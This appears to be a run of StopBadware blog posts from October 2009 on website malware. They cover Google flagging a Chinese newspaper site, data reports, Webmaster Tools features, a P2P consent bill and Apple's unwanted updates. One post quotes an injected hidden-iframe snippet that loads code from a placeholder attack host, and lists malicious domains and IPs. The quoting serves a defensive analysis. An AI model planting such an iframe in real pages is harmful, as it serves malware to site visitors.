StopBadware Blog :

Prominent Chinese site flagged for badware

Tue, 27 Oct 2009 16:45:00 -0400

It was reported today that a website of the official newspaper of the Chinese government, The People’s Daily, was flagged for malware by Google. The paper apparently complained that Google was maliciously flagging the site due to the paper’s criticism of Google Library. Google China denied the allegation, pointing out that the site was flagged by automated anti-malware systems, not based on content. As reported, the Google statement makes a small mistake in indicating that StopBadware.org provided the software for this automated system. In fact, Google’s Safe Browsing team developed the system themselves. For more information, see the relevant section of our FAQ.

The important lesson of this incident is that legitimate websites, whether operated by individuals or by large government-sponsored organizations, can fall victim to badware. Indeed, in China, where infection rates have historically been high, we hope this will serve as a wake-up call to website owners, hosting companies, and other parties about the need to secure their sites and platforms.

More on .NL attacks

Fri, 23 Oct 2009 16:43:00 -0400

Last week I wrote about a new string of attacks we noticed pointing to servers in the Netherlands. Over the weekend I found some public sources which show a more complete list of the attack sites which share the list of IP addresses. Hosts-file.net has a decent compilation of each of the five addresses we listed:

16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER
15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON
15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON

Interestingly the domains don’t overlap in every instance so not every one of the domains listed are necessarily serving out badware. Google, our data partner, says that over 12,000 websites have been infected which point back to one of the sites on these 5 IP addresses. I’m still working on obtaining a full list of all the infected sites to analyze the distribution of the victims. My assumption is that certain web hosts were harder hit than others but this is entirely speculation until I can analyze the full list.

If you have any information regarding these attacks please feel free to write us at contact <at> stopbadware <dot> org

A light diversion

Fri, 23 Oct 2009 09:44:00 -0400

Security firm Comodo offers this self-promoting but rather humorous spoof of the cable TV show Intervention. In this case, the addict is a laptop that is addicted to malware. (Also available here.)

New StopBadware data reports

Fri, 23 Oct 2009 11:25:00 -0400

We are pleased to unveil two new data reports, based on the data provided by Google and Sunbelt Software to our Badware Website Clearinghouse and information that we’ve pulled from Team Cymru’s public IP to ASN mapping service. One report lists the 50 Autonomous Systems (AS) hosting the greatest number of reported badware URLs. Set up like a stock ticker chart, it also displays the percent daily change in the number of URLs reported on each AS and the 52-week highs and lows for each AS. (Though the data starts in July, 2009, so it’s not yet reflecting 52 weeks.) See the Top 50 report here. There is also a link to it from the left-side navigation bar on the StopBadware.org home page.

The second report, available for any individual AS in our Clearinghouse, shows a graph of the number of reported badware URLs hosted by the AS over time. See an example here, search for an AS by number here, or click more info next to any AS in the Top 50 report for detail on that AS.

Both reports are updated daily and offer the ability to download the data in CSV format. We also wrote up a brief explanation of how to interpret the data in the reports.

We hope that both reports will be valuable to researchers, network operators, and others interested in observing web-based malware trends. Please let us know what you think by sending us a note at contact @ stopbadware dot org.

Google offers webmasters more malware details

Thu, 22 Oct 2009 10:15:00 -0400

Google’s Webmaster Tools has, for quite some time, provided verified website owners with a partial list of pages from their site in which Google found badware during their scanning. Unfortunately, it was often frustrating to site owners to know that Google detected something on a page without knowing what the problem actually was. This frustration should be largely eliminated now that Webmaster Tools has added an experimental Labs feature called "Malware Details," which at least in some cases provides more information to the site owner, as shown in this screenshot from the blog post announcing the feature:

This is a big step forward and should make life much easier for the website owners whose sites have fallen victim to malware. Now, if we can just get Google to share this data with us, so we can better help users who have submitted review requests…

[Update: I just saw that the same blog post mentions another feature, Fetch as Googlebot, which will display a particular page as seen by Google’s web crawler. This also, as noted in the post, can be helpful in diagnosing malware, as it allows the site owner to see how Google’s view of the page differs from the user’s own view. One cause of such a difference is malware that responds differently to different agent or referrer strings in the http request.]

Obama administration supports cyber security month

Mon, 19 Oct 2009 15:57:00 -0400

President Obama recorded the following video (also available here) promoting National Cyber Security Awareness Month and reminding all Americans of our shared responsibility to keep the ‘net safe.

In addition, Janet Napolitano, Secretary of Homeland Security, will be delivering a live webcast tomorrow (Tuesday, Oct. 20, 11 a.m. EDT) on the issue of cyber security and the role that the Department of Homeland Security is playing in this field. The webcast will be available from DHS.gov

Interesting attacks from .NL addresses

Fri, 16 Oct 2009 15:55:00 -0400

I’m researching some new attacks that have been popping up on the BadwareBusters forum recently.

Attacks have the form:

<div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http:ATTACK.SITE:8080/index.php"></iframe></div>

After reviewing the posts by our users I compiled the following list of attack sites:

* bio-vozrast.ru
* your-bio.ru
* biovoz.ru
* age-info.ru
* bio-z.ru
* theprevious.ru
* age-ega.ru

all domains point to a pool of 5 NL based IP addresses:

IP Addresses of Attack Sites
AS	IP	CIDR	AS Name
16265	85.17.138.27	85.17.0.0/16	LEASEWEB
16265	85.17.237.5	85.17.0.0/16	LEASEWEB
15703	87.233.139.100	87.233.128.0/18	TRUESERVER
15435	217.23.4.76	217.23.0.0/20	KABELFOON
15435	217.23.5.27	217.23.0.0/20	KABELFOON

A cursory portscan shows a wide range of services open for each IP address. 85.17.138.27 has two ports which claim to be webmin interfaces for karaokeplus.info. It is unclear if karaokeplus.info is related to these attack sites.

Of the three AS blocks listed (each corresponding to some sort of internet service) only one has an easy to find abuse address:

abuse@leaseweb.com

I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.

Proposed bill pushes informed consent for P2P sharing

Tue, 06 Oct 2009 09:26:00 -0400

As reported by Ars Technica and others, Rep. Henry Waxman (D-WA) and the rest of the House Energy & Commerce Committee are pushing a bill that requires peer-to-peer (P2P) file sharing applications to provide informed consent before installation and before making files available for sharing. The bill labels a failure to provide the required consent as an unfair trade practice, which means the Federal Trade Commission (FTC) can use its authority to punish the offending software distributor. The motivation for the bill seems to be a combination of two concerns: first, that important confidential files may be inadvertently shared by government or corporate employees; and second, that individuals accused of illegal file sharing may use "I didn’t know I was sharing those files" as a defense.

From my initial read of the bill (PDF), this seems like decent legislation. It is brief and clear in its definitions, and the only requirements are "clear and conspicuous notice," "informed consent," and the ability to uninstall or disable the software, all of which approximate the language we use in our software guidelines. There is an appropriate exception for software that is pre-installed on the computer (the user doesn’t have to consent prior to installation but is required to be notified that the software is installed). The most notable thing about the bill is probably what isn’t covered: software installed by the government (let’s call that the "FBI exemption"), non-commercial software (probably because there’s no entity for the FTC to punish for unfair business practices), and several specific categories of software that don’t look like P2P software (servers, communications apps, and security software).

I can’t help wonder about the sense in legislating behavior of only one specific type of application, but I have to admit it seems like the bill addresses the specific concerns about P2P software I alluded to earlier without overstepping. It’s good to see legislation that doesn’t try to dictate technical solutions and instead sticks to the basics: tell the user what is happening, and let him/her decide what to do next.

It's National Cyber Security Awareness Month!

Thu, 01 Oct 2009 16:07:00 -0400

Today marks the start of National Cyber Security Awareness Month here in the U.S. Organized by our friends at the National Cyber Security Alliance, NCSAM is a reminder to all of us, individuals and organizations alike, of our shared responsibility for keeping ourselves and each other safe online.

Here at StopBadware.org, we are evaluating our current work and looking towards our future. Over the coming months, how will the Clearinghouse evolve to best serve our partners and the public? How can BadwareBusters.org become an even better resource for those in need of badware help? What steps can we take to further build a community of people passionate about fighting back against badware?

We’d love your help in answering these questions. Please let us know your thoughts in the comments, on BadwareBusters.org, or via e-mail at contact@stopbadware.org.

Apple pushes false update, then backtracks

Wed, 30 Sep 2009 12:32:00 -0400

Bloggers such as Ed Zott reported this week that Apple once again used its Apple Software Update tool to offer "updates" to software that was not installed on the user’s computer:

Under the Updates heading, Apple says I need the iPhone Configuration Utility. Oh really? Why, for heaven’s sake? I’ve never plugged an iPhone (or an iPod or any other Apple-branded hardware) into this computer. I have absolutely no need for this program. It will do nothing except take up disk space and memory and potentially represent a vector for security issues.

Ed updated the post about a day later to indicate that Apple had changed its behavior:

The iPhone configuration utility has apparently been removed from the Updates list. The contents of the New Software section are unchanged however, with QuickTime and iTunes both being selected by default when using the Apple Software Update utility. Thanks to Gregg Keizer of Computerworld for the tip.

StopBadware readers may recall that Apple found itself on the wrong side of the community last year, when Apple Software Update started pitching Safari and iTunes as "updates," when the apps were not installed on users’ computers. They changed their behavior after a community backlash that included pressure from StopBadware.org. Some felt at the time that Apple did not go far enough in changing the language of the tool, pointing out that these optional application installs were still selected by default in the update tool. However, this is the first time since then that we’ve heard about another false update. One presumes it was a mistake on Apple’s part, but even so, Apple should know better after last year’s experience.